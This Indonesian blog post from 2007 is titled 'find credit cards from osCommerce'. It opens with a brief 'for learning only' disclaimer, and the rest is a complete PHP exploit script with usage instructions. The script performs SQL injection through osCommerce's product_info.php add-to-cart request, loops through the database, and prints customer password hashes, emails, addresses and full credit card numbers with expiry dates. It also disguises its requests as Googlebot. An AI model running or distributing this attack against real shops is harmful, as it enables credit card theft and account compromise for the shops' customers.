Wednesday, October 31, 2007

Cari CC dari osCommerce

Artikel ini hanya untuk pembelajaran saja untuk para webmaster. tidak ada yang berbahaya dalam artikel ini. Yang menjadikannya berbahaya adalah orang yang menggunakannya untuk kepentingan tidak baik saya tidak bertanggung jawab atas segala pengrusakan yang terjadi setelah anda membaca artikel ini
Cari CC dari osCommerceDapatkan CC Info dari bug osCommerce

————– Exploit Code ————-

#!/usr/bin/php -q -d short_open_tag=on

error_reporting(0);
ini_set(”max_execution_time”,0);
ini_set(”default_socket_timeout”,5);

if ($argc<5) {
echo ” Exploit osCommerce < 2.2 Milestone 2 060817 “;
echo ” Usage: php “.$argv[0].” host path product_id whatinfo OPTIONS “;
echo ” host - target server (ip/hostname) “;
echo ” path - path to osCommerce “;
echo ” product_id - Valid product_id “;
echo ” whatinfo - pass for password, cc for credit card info, addr for address “;
echo “Options: “;
echo ” -D: Show debug or verbose on “;
echo ” -p[port]: specify a port other than 80 “;
echo ” -P[ip:port]: specify a proxy “;
echo “Example: “;
echo ” php “.$argv[0].” localhost /os2/catalog/ 2 pass “;
echo ” php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 pass -p8080 -P192.168.1.108:3128 -D “;
echo ” php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 cc -p8080 -P192.168.1.108:3128 “;
die;
}

$host=$argv[1];
$path=$argv[2];
$products_id=$argv[3];
$whatinfo=$argv[4];
$port=80;
$Debug=0;
$proxy=”";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp==”-p”)
{
$port=str_replace(”-p”,”",$argv[$i]);
}
if ($temp==”-P”)
{
$proxy=str_replace(”-P”,”",$argv[$i]);
}
if ($temp==”-D”)
{
$tmp=str_replace(”-D”,”",$argv[$i]);
$Debug=1;
}
}

if (($path[0]<>´/´) or ($path[strlen($path)-1]<>´/´)) {echo ´Error… check the path!´; die;}

if($Debug==1) {
echo “Name : osCommerce Multiple Vulnerabilities “;
echo “Date : August 17, 2006 “;
echo “Vendor : osCommerce “;
echo “URL : http://www.oscommerce.com/ “;
echo “Version : osCommerce < 2.2 Milestone 2 060817 “;
echo “Risk : Multiple Vulnerabilities “;
echo “Exploit : Customers Info, Pass, and Credit Info Disclosure “;
echo “Author : Perseus “;
echo “Compatibility : magic_quotes_gpc off, union supported “;
echo “Greets : rgod, James Bercegay, str0ke, hdm, r57 “;
}

// try if you can rewrite this code to attack osc with magic_quotes_gpc on
// because I found it impossible for the moment.
// this will make oscommerce people update their vuln servers right now.

$proxy_regex = ´(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})´;
if ($proxy==´´) {$p=$path;} else {$p=´http://´.$host.´:´.$port.$path;}
$loop = 1000;

function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex, $Debug;
if ($proxy==´´) {
if($Debug==1) echo ” Processing packets directly… “;
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo ” No response from “.$host.”:”.$port.” “; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo ´Not a valid proxy…´;die;
}
$parts=explode(´:´,$proxy);
if($Debug==1) echo ” Processing packets using proxy “.$parts[0].”:”.$parts[1].” … “;
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo ” No response from proxy… “;die;
}
}
fputs($ock,$packet);
if ($proxy==´´) {
$html=´´;
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html=´´;
while ((!feof($ock)) or (!eregi(chr(0×0d).chr(0×0a).chr(0×0d).chr(0×0a),$html))) {
$html.=fread($ock,1);
}
}

fclose($ock);
#debug
#echo ” “.$html;
}
$bl=0;
for($y=0;$y<=$loop;$y++) {
//1. get cookie
$out = “GET “.$p.”product_info.php?products_id=”.$products_id.” HTTP/1.1 “;
$out .= “Host: “.$host.” “;
$out .= “Connection: Close “;
sendpacketii($out);
$e = explode(”Set-Cookie: osCsid=”,$html);
$e2 = explode(”;”,$e[1]);
$cookie = $e2[0];

//2. injection
if($whatinfo==”pass”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, customers_password, ´^´, customers_email_address,´|´,customers_firstname,´|´,customers_lastname,´|´,customers_dob,´|´,customers_telephone, ´^´) , 0 , 0
FROM customers LIMIT “.$y.”,1 /*”;

} elseif($whatinfo==”addr”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, entry_company, ´^´, entry_firstname,´|´,entry_lastname,´|´,entry_street_address,´|´,entry_suburb,´|´,entry_postcode,´|´,entry_city,´|´,entry_state, ´^´) , 0 , 0
FROM address_book LIMIT “.$y.”,1 /*”;

} elseif($whatinfo==”cc”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, cc_type, ´^´, cc_owner,´|´,cc_number,´|´,cc_expires,´|´,billing_street_address,´|´,billing_suburb,´|´,billing_city,´|´,billing_postcode,´|´,billing_state,´|´,billing_country,´^´) , 0 , 0
FROM orders LIMIT “.$y.”,1 /*”;

}

$sql=urlencode($sql);
$data = “id[0]=”.$sql.”";
$data.=”&products_id=”.$products_id.”";
$out = “POST “.$p.”product_info.php?products_id=”.$products_id.”&action=add_product&osCsid=”.$cookie.” HTTP/1.0 “;
$out .= “User-Agent: Googlebot/2.1 “;
$out .= “Host: “.$host.” “;
$out .= “Accept: text/plain “;
$out .= “Connection: Close “;
$out .= “Content-Type: application/x-www-form-urlencoded “;
$out .= “Cookie: “.$cookie.” “;
$out .= “Content-Length: “.strlen($data).” “;
$out .= $data;
sendpacketii($out);

//3. get vals
$out = “GET “.$p.”shopping_cart.php?osCsid=”.$cookie.” HTTP/1.1 “;
$out .= “Host: “.$host.” “;
$out .= “Connection: Close “;
sendpacketii($out);
//echo $html;
$e = explode(”M||||”,$html);
$e2 = explode(”^”,$e[1]);
$str = ” “.$y.”. “.$e2[0].” “.$e2[1].” “;
echo $str;
$strl = strlen($str);
if($strl<=25) $bl++;
if($bl==3) break;

}

?>

——- End Code ———–

Posted by gresikblog at 7:55 PM

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)